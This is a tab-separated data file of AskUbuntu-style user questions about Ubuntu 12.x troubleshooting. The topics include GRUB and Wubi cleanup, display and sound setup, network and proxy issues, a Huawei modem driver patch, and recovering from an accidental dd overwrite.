264344	fixing grub menu after migrating wubi to partition	i installed ubuntu 12.04 via wubi a couple of weeks ago , and today used the script on https : //help.ubuntu.com/community/migratewubi to move it to a new partition . now i 'm having a bit of confusion about how to clean up the original wubi install . here 's the setup : two hard drives , /dev/sda contains my windows 7 install , and /dev/sdb is a secondary drive with a large partition for data . i had wubi installed on /dev/sdb1 , and have now created two new partitions sdb2 and sdb3 for the installation and swap respectively . on booting , the computer starts the windows boot manager with two options , windows and ubuntu ( this is the behaviour i want , as i use windows the majority of the time and do n't want to accidentally boot to ubuntu while windows is hibernated ) ; but now the grub loader on choosing the ubuntu option has suddenly become rather crowded . it seems that wubi has been left intact at the top of the list , with the migrated version ( on /dev/sdb2 ) pushed lower down on the list . this has left me with two questions : how do i remove the wubi installation from the grub list ? is it safe now to uninstall wubi from within windows while still allowing its boot manager to direct to grub on the second drive ? cheers . edit : i 've tried using the ubuntu-tweak program as advised below , and it raised rather an interesting question . there were a couple of old kernel versions which were also being shown in the grub list , and that i 'd removed . trying to run any of those gives an error along the lines of `` you need to load the kernel first '' . sudo update-grub did n't take them off the list , and in fact according to the status output it should have also added windows to grub ( which it had n't ) . rebooted into windows and ran bcdedit , and it looks like it 's using wubi 's version of grub with the new version added ( hence why update-grub is n't helping at all ) . this is the relevant section from the bcdedit output : real-mode boot sector -- -- -- -- -- -- -- -- -- -- - identifier { 816916df-c233-11e0-a9e6-883a7e390b89 } device partition=g : path \ubuntu\winboot\wubildr.mbr description ubuntu where `` g : \ubuntu '' was the original install folder for wubi . when i ran the migration script in the first place it said that it was installing grub to /dev/sdb - but this on its own is n't a partition . is there somewhere particular where the migration script could have installed grub , i.e . somewhere i can point the bootloader so that it will use the correct version of grub ? ( after that i 'm pretty sure the question about uninstalling wubi is a moot point )
264345	xfce display setup	i have recently installed ubuntu 12.10 on another pc , and decided to install xfce ( by installing xubuntu-desktop ) everything works great , except xfce refuses to store my screen resolution and setup . i have two monitors , each with different resolutions : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - | | | | |left 1680x1050| |right 1920x1080| | | | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - | | | | however when booting and logging in to the xfce desktop i get : -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- | | | | |right 1680x1050| |left 1680x1050| | | | | -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- | | | | i.e . the screen resolutions are incorrect and the displays are the wrong way around . i have an xrandr command stored in a script which fixes this perfectly , but xfce wo n't run it at startup . i 've tried both adding the script to the startup applications list in the system settings ( using the gui ) and modifying session-setup-script property of the lightdm config ( as suggested here ) , and creating /etc/x11/xorg.conf with the settings . none of these worked . also , might be worth mentioning , at the login screen ( lightdm ) the resolutions and orientations are correct . any tips ? [ edit ] okay , i was asked to provide more information ... i 'm not sure what else i can really add , so i 'll just try to clarify ... i have a working shell script with the xrandr command that corrects the display setup , but i can not get it to run at startup . the script works fine when run manually after logging in . i have set the script as the display-setup-script and session-setup-script in /etc/lightdm/lightdm.conf as recommended here , which works for the login screen , but as soon as i log in , and the xfce desktop loads , the settings are ignored . as mentioned , i 've also tried adding the script to the startup applications via the setting manager gui , which had no effect .
264349	how can i use cron to run shells scripts at a fixed time ?	i am wanting to learn cron and i searched for some quality tutorials . i found how do i set up a cron job . my goal is to have a folder on a network that will have sub-folders . each sub-folder is a particular script that will be executed by the cron . i do n't want to overload our system so how can i create the cron the run a shell script after the assigned time and previous script is ran ? example : main folder sub1 - script1 sub2 - script2 sub3 - script3 cron 10:01 - runs script1 cron 10:02 - runs script2 cron 10:03 - runs script3 cron 10:04 - runs script1 cron 10:05 - runs script2
264361	where is `` show position of the mouse when the control key is pressed ''	i am using ubuntu 13.04 . ctrl key in virtualbox is not working for me , that 's because the `` show position of the mouse ... '' is hogging the ctrl key . i do n't see an option to disable this in the mouse settings . any idea what is going on ? any way to modify this behavior without the gui ?
264362	ubuntu 12.04 freeze after changing graphic card	my ubuntu 12.04 freezes on start up after i changed graphic card . previously i had ati radeon saphhier 6850 and everything was ok , then i removed it and put some old nvidia graphic , and even then it was ok , and now i got new one , ati radeon saphhire 7850 ... ubuntu loads untill welcome screen then it freezes , mouse is working but interface is unclickable , and lower right corner says amd hardware unsupported . i need to do hard reset . any help ?
264368	how to integrate outlook 2003 pst file to thunderbird	i backed up all emails in outlook 2003 that resulted in a pst file . wiped out computer and installed ubuntu 12.04 . opened thunderbird and after clicking on tools and import ... nothing shows up in the from : box . some research i found said to install readpst but after it 's installed i 'm still having trouble figuring out how to run the program . is there another option ? some other way than typing code that i do n't understand to convert the pst file to thunderbird email file and import/integrate the saved/backup up outlook 2003 file into thunderbird ?
264374	how to recover from wiping by dd a partition table on external disk ?	yesterday i used dd to write an os into my raspberry pi flash card . even though all my commands ( i checked history ) were for /dev/sdd which was the flash , when i checked my external drive ( 500gb ) there were only 2 partitions there , one of 3 gb and one of 15mb instead of all my precious data . is there any way to recover from that ? cause , theoretically my data is still there . or shall i just start crying ? this is the command i ran : sudo dd bs=4m if=~/downloads/retropieimage_ver1.2.1.img of=/dev/sdd
264376	battery indicator does n't change its status ( but after reboot )	the problem is the same as here : the icon does not change when the power cord is plugged in or unplugged ( the icon remains a battery if that was the power source on boot but wo n't change if i plug in the power adaptor and visa-verse ) . the battery indicator does not give me a low battery warning or alert ( ubuntu just shuts down with no onscreen warnings ) . info : i use ubuntu 12.04 lts , 64 bit reinstalling gnome-power-manager did n't work acpi -b returns `` battery 0 : unknown , 95 % ''
264384	updating 10.10 to the latest version through a firewall	i 've had ubuntu 10.10 on my server since i bought it several years back . i 've tried to upgrade in the past but i 'm always thwarted by my company 's firewall . i receive messages like these : w : failed to fetch http : //security.ubuntu.co/ubuntu/dists/natty-security/main/source/sources.gz 407 proxy authentication required ( forefront tmg requires authorization to fulfill the request . access to the web proxy filter is denied. ) i have my system > preferences > network proxy > http proxy set appropriately ( to use port 80 to get through our firewall . ) but still no luck . i 'm looking to upgrade from ruby 1.8.7 to 1.9.3 and i 'm really hesitant to install rvm until i 've gotten this ubuntu upgrade successfully completed . can anyone suggest what i might be doing wrong / need to change ? thanks , dean richardson
264385	how do i install ubuntu on a laptop that has had its windows operating system removed ?	as a charity we have been donated an hp laptop . unfortunately it has been cleaned to such an extent that the original vista operating system has gone . i have created a usb drive containing the ubuntu linux system , and tried to use this as the boot . however , after a short time the boot hangs . is there any way i can install linux on this laptop ?
264386	loud fan and very hot pc	i know , that you do n't like when someone ask same question as is answered but i try a lot of solutions and nothing helped ... i installed ubuntu 12.10 , everything is good but fan is very noise and battery life decrease from about 3,5h to 1,2h . i tryed everything i found ( jupiter , powertop , to install drivers , switcheroo etc . ) but nothing helped ... hp probook 4530s 3,8 gib intel pentium cpu b950 @ 2.10 ghz x2 graphic- intel sandybridge mobile 64-bit another graphic card radeon 6490m sorry for my english
264397	how to make huawei e3276 to work	i have problem with my new huawei e3276 usb modem . i have found a solution which i quote ( original post : https : //answers.launchpad.net/ubuntu/+source/gnome-nettool/+question/211095 ) : '' with the support of linux community the huawei e3276 is supported now ( see thread here http : //lists.freedesktop.org/archives/libqmi-devel/2012-november/thread.html ) . you need an updated cdc_ncm.ko driver and then connect with echo -e `` at^ndisdup=1,1 , \ '' online.telia.se\ '' \r '' > /dev/ttyusb0 dhclient wwan0 assuming you have configured usb modeswitch beforehand with : echo `` 12d1 1506 '' > /sys/bus/usb-serial/drivers/option1/new_id works with telia in sweden . bjorn will push this into the linux main branch soon , but if you are eager to hack , you can update drivers/net/usb/cdc_ncm.c with this : diff -- git a/drivers/net/usb/cdc_ncm.c b/drivers/net/usb/cdc_ncm.c index 4cd582a..74fab1a 100644 -- - a/drivers/net/usb/cdc_ncm.c +++ b/drivers/net/usb/cdc_ncm.c @ @ -540,10 +540,12 @ @ advance : ( ctx- > ether_desc == null ) || ( ctx- > control ! = intf ) ) goto error ; - /* claim interfaces , if any */ - temp = usb_driver_claim_interface ( driver , ctx- > data , dev ) ; - if ( temp ) - goto error ; + /* claim data interface , if different from control */ + if ( ctx- > data ! = ctx- > control ) { + temp = usb_driver_claim_interface ( driver , ctx- > data , dev ) ; + if ( temp ) + goto error ; + } iface_no = ctx- > data- > cur_altsetting- > desc.binterfacenumber ; @ @ -623,6 +625,10 @ @ static void cdc_ncm_unbind ( struct usbnet *dev , struct usb_interface *intf ) tasklet_kill ( & ctx- > bh ) ; + /* handle devices with combined control and data interface */ + if ( ctx- > control == ctx- > data ) + ctx- > data = null ; + /* disconnect master -- > disconnect slave */ if ( intf == ctx- > control & & ctx- > data ) { usb_set_intfdata ( ctx- > data , null ) ; @ @ -1245,6 +1251,14 @ @ static const struct usb_device_id cdc_devs [ ] = { .driver_info = ( unsigned long ) & wwan_info , } , + /* huawei ncm devices disguised as vendor specific */ + { usb_vendor_and_interface_info ( 0x12d1 , 0xff , 0x02 , 0x16 ) , + .driver_info = ( unsigned long ) & wwan_info , + } , + { usb_vendor_and_interface_info ( 0x12d1 , 0xff , 0x02 , 0x46 ) , + .driver_info = ( unsigned long ) & wwan_info , + } , + /* generic cdc-ncm devices */ { usb_interface_info ( usb_class_comm , usb_cdc_subclass_ncm , usb_cdc_proto_none ) , '' i have a fresh installation of ubuntu 12.10 and my problem is first of all i do n't know how to edit in drivers/net/usb/cdc_ncm.c . do i have to install something before i can edit cdc_ncm.c ? thanks for your help !
264398	cisco anyconnect vpn client broke my internet	i was using the anyconnect client when it froze and i had to do a hard reboot of my computer . now i ca n't connect to the internet at all , with or without vpn . the network connections manager seems to think i have a wired and wireless connection without a problem , but i ca n't go online . i have tried using /etc/init.d/networking restart and it even says it is `` ok '' with no luck . i am guessing i need to clear some settings somewhere and restart a service , but i am not sure what . thanks !
264401	why is cinnamon blocking function keys ? f1-12 are n't getting to the terminal	i map the function keys in vim to modify a ton of stuff , from syntax line numbering to autoindenting to changing the tab width and syntax highlighting . unity was a major problem here because if i mapped f7 ( and a few others , i do n't remember which ) in vim , using them would freeze the terminal until i dropped to the hardware console and did a kill -9 on vim . so i switched to cinnamon , which has been a huge improvement in many ways , but i 've entirely lost the function keys . none of them are shortcut mapped , so i know it 's not that . what else could be causing the problem and how do i fix it ?
264404	apache not accepting connections	i 'm running a yii php web application on ubuntu 12.04 . it was working great for a while but now it refuses connects to port 80 about 80 % of the time . every once in a while it will work fine for a minute or two . netstat says the port is listening . when i try to ncat to the port it says the target machine actively refused the connection . i have no iptables setup . the server is on a virtualbox vm running on a windows 7 desktop . i can ping the ubuntu vm from the desktop . here is my /etc/apache2.cfg lockfile $ { apache_lock_dir } /accept.lock pidfile $ { apache_pid_file } timeout 300 keepalive on maxkeepaliverequests 100 keepalivetimeout 5 < ifmodule mpm_prefork_module > startservers 5 minspareservers 5 maxspareservers 10 maxclients 150 maxrequestsperchild 0 < /ifmodule > < ifmodule mpm_worker_module > startservers 2 minsparethreads 25 maxsparethreads 75 threadlimit 64 threadsperchild 25 maxclients 150 maxrequestsperchild 0 < /ifmodule > < ifmodule mpm_event_module > startservers 2 minsparethreads 25 maxsparethreads 75 threadlimit 64 threadsperchild 25 maxclients 150 maxrequestsperchild 0 < /ifmodule > user $ { apache_run_user } group $ { apache_run_group } accessfilename .htaccess < files ~ `` ^\.ht '' > order allow , deny deny from all satisfy all < /files > defaulttype none hostnamelookups off errorlog $ { apache_log_dir } /error.log loglevel warn include mods-enabled/*.load include mods-enabled/*.conf include httpd.conf include ports.conf logformat `` % v : % p % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' vhost_combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o '' common logformat `` % { referer } i - > % u '' referer logformat `` % { user-agent } i '' agent include conf.d/ include sites-enabled/ most of the time it will refuse to connect , but sometimes it can load the index.html file , but none of my php files . any ideas ?
264405	how do i widen cinnamon 's panel entries ?	i pack a great deal of information into the status line of terminals and like to be able to see it in the panel , but to see it all , i need cinnamon to let me make the panel entries a bit wider . i 've already shrunken the font as far as i dare in the cinnamon.css # panel.font-size . how do i change the default width of panel entries ?
264408	setting a static ip address .	i 'm trying to set a static ip address in 12.10 . when i run ifconfig , i find that both lo and wlan0 have downloaded packets . in my /etc/network/interfaces file it says auto lo . which should i be setting ? if i set the ip address the graphical way , through network settings , do i need to change the settings for both ipv4 and ipv6 ? how do i set my ip address to static and how do i know what ip address to use ?
264409	libre office presentation background with dark gtk theme	i 'm using a dark gtk theme . for some reason libre office writer has a white background ( like i want ) , but impress does not . i do remember i had a white background in impress as well some installations ago , so i think it should be possible to get this . i 'm not sure if it matters , but i 'm using xubuntu with xfce 4.10 . i just upgraded libre office to version 4 , but the problem remains the same .
264412	installing ubuntu alonside windows 8	how do i install ubuntu alongside windows 8 without having to partition the hard drive . can someone please explain in detail to a newbie .
264416	dual ubuntu installations with whole disk encryption	my goal is i want to have a xubuntu/ubuntu dual boot , with a catch - i want the disk to be fully encrypted with the dm-crypt ( native supplied ) whole disk encryption . now i know , out of the box the ubuntu installer is not going to make this simple for me , and maybe this is not doable , because i am not sure i can ultimately trick the tools into creating the two different initrd configurations for each root filesystem . so questions : has anyone done this before and is there a simple way i am missing to do this ? given ( 1 ) is a negative ... a . should i create separate base ecrypted volumes for each installation ( xubuntu/ubuntu ) or should i just create 1 encrypted volume and separate install partitions inside it ? i am leaning toward the latter to make the process simpler . however i am not sure how the boot loader will handle this . b . once i get the first laid in , if i go with 1 encrypted volume , how do i decrypt it and install the second distro ( and get the boot loader , initrd , etc updated properly ) ? i 've asked about the security aspects on security stack exchange .
264417	keyboard click persists	i am using ubuntu 12.10 . i find that button clicks for ctrl , shift and alt persist for a second or two . that is , if i press a , i get small a . however , if i press shift , wait for a second and press a , i get a capitalized a . note i am not pressing shift and a together to produce the uppercase letter , there 's a gap of a second between two presses . this is very annoying because whenever i am on a page in firefox and accidentally press ctrl and scroll down using touchpad it produces zoom out effect and font gets smaller . please suggest a remedy .
264418	ca n't move layers into layer groups in gimp	i have an image with 2 layers at the moment , i created a layer group to start organizing stuff before i continue with my design , however , as much as i click and drag the layers to the group nothing happens ( or actually the layer floats back to its positions ) . i do n't know if it is that i 'm doing something wrong as i ca n't select multiple layers either . i 'm running xubuntu 12.10 with gimp 2.8.2 ( with whatever plugins , etc that it comes with by default on xubuntu )
264423	stuck under 12.04 back page with ubuntu logo without entering the system	you must know : i have a asus laptop with nvidia geforce gt 220m 1gb running windows 7 and ubuntu 12.04 lts . all the drivers are up to date , and actually i updated my nvidia card 2 weeks ago and there was not problem with graphics just with wifi detector , but that was solved suddenly 1 week ago : when i start the ubuntu from grub menu , i see the purple for 0.25 second after that i am stuck under 12.04 low graphic logo without entering the system i can access startx with no wifi and no programs and just few basic programs i tried the repairing from grub menu but no use , also going back to a previous version did n't solve a thing . today i found this when i tried to start ubuntu ubuntu 20.04 lts ab ... tty1 username login : * starting mount network filesystems *stopping mountnetwork systems i accessed the command line and wrote : sudo startx it asked me for username and password then a black screen , after that . .. .. .. .. .. . xinit : giving up xinit : unable to communicate to x server no such file on directly xinit : server error i tried sudo apt-get update sudo apt-get upgrade but i noticed that it showed in the end of the upgrade that there is no space enough for the last upgrades , i could n't follow what are they if that is important update 3/9/2013 when i started ubuntu today it showed me this screen for less the none second written under it beta driver in red any ideas , thanks you for reading
264425	create a deb containing object files and link in the target machine	i 'm working on a project where we have a couple of machines running some applications developed by our dev team . all the machines use the same ubuntu version ( 12.04 x64 ) . we want to use deb packages to install and upgrade the applications ( we build the packages using checkinstall ) . it is a good idea to include just the object files ( .o ) and link the files with the shared libraries when installing the deb ? ( just to avoid problems with shared libraries ) or it is not necessary ( it does n't prevent any problem ) and we just put the single binary already linked on the deb package . we want to distribute the binaries , not the source code . compile on the target machine is not a option . thanks !
264433	making shortcuts on the launcher with .desktop	i 'm using ubuntu 12.10 , and i want to make a keyboard shortcut for some software , but i do n't understand what should be filled in for the `` name '' and `` command '' . can you help me ? thank you .
264437	installing tar.gz when there is no configure file	i 've downloaded a tar.gz for the game solar 2 , and extracted it . frustratingly , there is no configure file for it , nor is there an install or a readme file . if i skip straight to the `` make '' command , it tells me there 's no targets specified and no makefile found . i 'm also having the same problem with another game i 've downloaded , nightsky . not quite sure how to proceed . i ca n't find any official documentation or anyone else having these problems . any suggestions ?
264438	mac pro with ati radeon 5770 - ubuntu 12.04 x64 and 3 monitors	does anyone know whether i 'll be able to run 3 monitors on my ati radeon hd 5770 with latest version of ubuntu . i 'm completely new to running ubuntu as my operating system , but after today 's disaster with snow leopard , which has crashed 3 times i 've decided to finally give it a go and i truly hope it will be the system i 've been looking for for many years .
264444	12.04 /opt/qt5 do n't exist	i installed qt5 using official ppa and also i followed instructions how to setup ubuntu components . but also i noticed that /opt/qt5 folder do n't exist , therefore i ca n't use qmlscene . how to fix this ?
264445	persistent notifications in unity	i 'm a new user having just installed ubuntu 12.10 . i 'm getting along well , but something is bugging me . i keep missing notifications which is getting me in trouble . is there a way to make notifications / events more persistent ? in windows , for example , the taskbar flashes until i click it . in android an icon stays in the taskbar until i tap or swipe it away . regardless of the app . is there something similar i can do with unity ? make the app icon flash when something happens ? thanks !
264447	how to correctly change machine name ?	i 've changed my machine name through editing /etc/hostname file . but since i did , a weird message appears whenever i sudo : sudo : unable to resolve host tehuti then it asks for password normally . what is wrong and is there a correct way to change name with causing problems ?
264448	mount logical volume failing	i 'm trying to mount my logical volume and get the following error : root @ mediaserver : /home/jon # mount /dev/mediaserver/homeserver /media mount : you must specify the filesystem type so i tried to specify ext4 type : root @ mediaserver : /home/jon # mount -t ext4 /dev/mediaserver/homeserver /media mount : wrong fs type , bad option , bad superblock on /dev/mapper/mediaserver-homeserver , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so then tried ext2 : root @ mediaserver : /home/jon # mount -t ext2 /dev/mediaserver/homeserver /media mount : wrong fs type , bad option , bad superblock on /dev/mapper/mediaserver-homeserver , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so where do i go from here ? i have 4tb of data sitting there i ca n't get to . info requested : ls -l /dev/mediaserver/homeserver lrwxrwxrwx 1 root root 7 mar 5 15:12 /dev/mediaserver/homeserver - > ../dm-2 file /dev/mediaserver/homeserver /dev/mediaserver/homeserver : symbolic link to `../dm-2' dmesg [ 23509.241733 ] ext2-fs ( dm-2 ) : error : ca n't find an ext2 filesystem on dev dm-2 . [ 23561.777635 ] ext4-fs ( dm-2 ) : vfs : ca n't find ext4 filesystem [ 23569.175763 ] ext2-fs ( dm-2 ) : error : ca n't find an ext2 filesystem on dev dm-2 . -- -- more info requested : jon @ mediaserver : ~ $ sudo ls -ll /dev/mediaserver/homeserver brw-rw -- -- 1 root disk 252 , 2 mar 5 22:17 /dev/mediaserver/homeserver jon @ mediaserver : ~ $ sudo file -sl /dev/mediaserver/homeserver /dev/mediaserver/homeserver : x86 boot sector ; partition 1 : id=0xe , active , starthead 0 , startsector 551228337 , 715429412 sectors ; partition 2 : id=0xc , starthead 0 , startsector 1287256334 , 76756965 sectors ; partition 3 : id=0x1 , starthead 0 , startsector 1635111194 , 16777344 sectors ; partition 4 : id=0x7 , starthead 0 , startsector 1793823873 , 20385300 sectors , code offset 0x31
264457	i need a proxy app that is n't tor !	hi my internet has censored by devil isp , i use freegate.tv and psiphone when i used windows before ubuntu . both are great and free . tor works very lazy and slow because my internet is very poor ( 512 kb ) so i need a free app to pass censorship but not tor . do you know another free app ?
264459	using juju with elastic block storage ( ebs )	is there a way we can use ebs for ec2 instance with juju . and possibility of scaling the storage after the deployment , thanks
264462	ubuntu 12.04 launcher icons missing	i just notice that the icons in the launcher are all missing . the launcher is there , but it is empty . now i have to use alt+tab to switch between opened applications . i do n't know what happened . i am just opening a lot of chrome tabs . can someone help me with it ?
264467	wacom ( 056a:010d ) touchscreen is not recognized on ubuntu 12.10 ( 64bit )	i have a fujitsu lifebook t902 , which has a wacom 056a:010d touchscreen . does anybody know where i could find a driver for this wacom touchscreen ?
264468	fan - always on : battery drain too high in ubuntu 12.10 x64	i bought an asus u36 ultrabook some time ago , because it had 4-6 battery hours ( average real values ) . now that i updated to ubuntu 12.10 x64 , my battery lasts less than 3:15 with the type of use i would get 5 hours at least in windows 7 . first i wondered that the gpu was always `` on '' , rather that using the igp ( low consumption within ivy bridge ) . however i ran some commands that clearly have shown that i do not even have the gpu working ( only the igp ) - which is fine by me . i also installed bumblebee and jupiter to try to control the power consumption - but the problem is the same - altough i might notice that with jupiter is less bad ( also , on demand governor works fine ) - but clearly this not normal . i suppose that in a `` normal '' notebook with 1:30 battery would get 30 minutes or something ( which is very bad ) . what can i do ? it 's probably related the very strange fact that : it 's cold in my domestic environment , and my fan is always working very fast . even when i 'm doing nothing , and has power saving governor .
264469	how is the development of mir going to affect x , wayland and other distributions ?	now that ubuntu/canonical is building their own display server what will happen with wayland and linux as a whole . with all this `` disruption '' around what will other distro 's ( fedora , opensuse , mint , arch etc . ) do : because clearly x will have to be replaced sooner or later .
264471	is running ubuntu with a virtual machine , like vmware , virtualbox , same as just running normally without ? ( functionality and experience wise )	i mean not performance wise , or hardware wise . any good config pc will run them on vms . i mean functionality wise n experience wise . is one able to install and run ubuntu linux applications just like normally in vms as they would work in a separate boot installed ubuntu ? and how can one install and run linux apps in ubuntu on vms ? i mean like compiz , emerald , ( linux versions of ) - utorrent , vlc , etc..etc.. on vm based ubuntu .
264474	trying to install an openvpn gui messed up sudoers	i installed openvpn successfully but i would like to get remote desktop access with it , as is the case with openvpn in windows . i found this gui here http : //sourceforge.net/projects/sogfl/ and installed it and everything , but i realized that it has actually messed up my /etc/sudoers file . it has added a line like this : % sogfl : all= ( root ) nopassword : openvpn ( not sure of the exact syntax because i ca n't open the file right now because sudo is n't working ) . is there any way i can fix this ? i noticed that /etc/group , my username is listed after sudo and admin , but not root ( which is blank ) . any fixes ? thank you !
264482	remote control a download manager	i am pretty much a newbie , but i have set up an old pc to run ubuntu as a file and print server in the home . so far everything is working great , but i want to be able to download files to the server , and control the download manager from another computer . right now i just use wget in the terminal . is there a good program that does this remotely from a web interface or do i need to figure out how to access my terminal from another computer and continue to use wget ? and if so , are there good instructions on how to set that up ? thanks !
264490	why am i getting a `` install rails '' prompt when it already is installed ?	i 'm inside of the terminal right now and just about to make a new application . i 'm inside of the app folder , did rails new -- help and pops up : the program 'rails ' can be found in the following packages : * rails * ruby-railties-3.2 try : sudo apt-get install < selected package > and this could n't be right because i installed rails using these instructions and everything is the latest and up to date : http : //ryanbigg.com/2010/12/ubuntu-ruby-rvm-rails-and-you/ why am i getting this prompt ? what do i have to do to get rails working ?
264491	wired lan problem in ubuntu 12.04	i am new to ubuntu i have installed ubuntu 12.04 as partition ( with dual boot ) using wubi . in that my wifi is working fine but lan is being detected but its not working . i have tried some of the solutions like : i opened : gksu gedit /etc/network/interfaces i added these lines to the file : auto eth0 iface eth0 inet dhcp then i restarted the network : sudo service networking restart but still the problem persists . why does ubuntu 12.04 has issues with lan when installed ? any help would be appreciated
264492	ubuntu / windows : to boot one or other i have to manually change os mode selection	on a new samsung laptop with windows 8 pre-installed i installed ubuntu . i 'm not an expert at all , i 've just followed various instruction available in the web . now , if the os manual selection is on csm os it will boot ubuntu , giving me the option of booting windows ( loader ) . but if i press that , it will tell me that the boot is corrupted and i ca n't go on . if i re-boot and select ubuntu it boots it normally . now , if on the other hand the os manual selection is on `` uefi '' or `` uefi and csm os '' , it will start windows 8 automatically . so , basically , i have to manually change it every time i want to switch from ubuntu to win 8 and vice versa , which is time consuming and little annoying . now , i repeat , i am very ignorant about these things , i just follow instruction carefully but i do n't know the language at all . i 've already tried boot repair in ubuntu ( did n't work ) and as well i 've tried windows boot recovery ( or something like that ) when is giving me the options : ubuntu ubuntu advanded options windows 8 loader etc i sense that , may be , i will have to re-install ubuntu . but i 've spent 4 hours trying to install it , every time i was trying to boot from a dvd or usb it was immediately booting win 8 , i was changing and changing the settings in uefi ( reading hundreds of threads and tutorials on-line ) before , eventually ) and without being sure of the way i was doing it ) being able to install it . bottom line , i 'd love to keep both windows and ubuntu cause i need them both and would like to be able to choose between the 2 without having to change the settings every time . thanks a mil for your help . fabrizio
264493	how to install websocket++ dependencies ?	i 'm trying to develop websocket applications in c++ . i 've chosen to use websocket++ since it 's a no-nonsense # include that does n't try to fallback to ajax and could potentially be used with any other # include . i 'm not too sure exactly what packages are required to take full advantage of websocket++ . please show me the name of these packages except the boost libraries which i 'm pretty sure can be installed with libboost-all-dev . here 's the list https : //github.com/zaphoyd/websocketpp/wiki/building-a-program-with-websocketpp : library required for boost_system builds that use asio or build environments without std : :error_code boost_regex build environments without std : :regex boost_random client role only , build environments without std : :random libcrypto required for tls socket component libssl required for tls socket component libz required for compression extension support libpthread required on posix for thread support librt required on posix for high resolution timer support ( some examples )
264496	lubuntu on virtual machine : ( minimum ) disk space requirements ?	minimum system requirements for xubuntu ( ... ) 5 gb of disk space with lubuntu , you can use computers with even less memory . i read the above as xubuntu and lubuntu both requiring a minimum of 5 gb free disk space . for argument 's sake , let 's say the free disk space requirement were indeed 5 gb for the regular , non-virtual installation of lubuntu . would a virtual installation ( e.g . in vmware , virtualbox , xen ) then necessarily require 5 gb of real , physical space , too ? back in the day , i worked a little with ms windoze virtual pc , but do n't recall the `` conversion factor '' of virtual to physical disk space ; but i 'm pretty sure it 's not `` unity '' ; ) ... but please do correct me if i 'm wrong ! ! ps : futher , i 'm aware of two installation methods : standard and alternate , the latter designed especially for systems short of memory ( ram ) . i did n't yet check the exact options the alternate installer would offer , e.g . selecting which programs not to install , thus reducing the free disk space requirement .
264505	install acer aspire one zg5 microphone on ubuntu 12.10	i just installed ubuntu 12.10 on a acer aspire one zg5 ( aoa 110 ) , then skype , and i ca n't make the microphone work . i tried this method with alsamixer https : //help.ubuntu.com/community/aspireone522 # microphone but it does n't works . the sound is not recognized by alsamixer , nor by the sound settings . i tried to make a test call on skype , but i ca n't hearmy voice back . i read that previous versions of ubuntu had some issues with the mic , maybe i have to debug something ... i hope you can help me
264508	can i install ubuntu on a pc that has a touch screen ?	specifically the hp envy touchsmart all-in-one 20-d003la - all in one - 1 x core i3 3220 / 3.3 ghz . i mean , if the touch screen will recognize the 5 fingers ?
264509	is utouch still in use or under development ?	i have not been hearing or seeing much regarding utouch , and with the recent developments regarding ubuntu touch , i 've been wondering , is utouch still used in ubuntu ( as in will it be a part of the platform going forward ) , and is it still being developed ?
264510	ubuntu studio , no sound on any device	it 's been two days i have tried to make this work . i have 3 sound output : regular audio jack from my soundcard , usb motu soundcard , usb logitech speakers . the latter two seem not to be detected at all . the first seems to be detected but still no sound . i have uninstalled and reinstalled pulseaudio and alsamixer according to some tip on a blog but it did not work either . all the above work like a charm on windows 7 and windows 8 . i 'm really trying to give ubuntu a try but it 's starting not to be such a great experience when i ca n't get something this simple to work after two days : | and yes i have double ( triple ) checked that the volume on all devices is not turned off and that no mute setting is on ( including auto-mute in alsamixer ) . does anyone have a clue what could be wrong ? thanks ( also , please assume i have no knowledge at all of ubuntu since it 's pretty much the case ) edit : here is the output of `` sudo aplay -l '' **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc889 analog [ alc889 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc889 digital [ alc889 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 my primary sound card ( i.e . not the external motu one ) comes from my motherboard , it 's a gigabyte z68 hd ( or something like that , will try to find the exact model ) .
264511	how can i add a statusnet account in gwibber ?	i 'd like to add my statusnet account ( not identi.ca ) to gwibber , which seems to have this ability , judging by the gwibber-service-statusnet package . the trouble is that when you go to add an account , instead of the old gwibber account screen , it now takes me to the central online accounts settings menu , which makes no mention of statusnet ! is this still possible ?
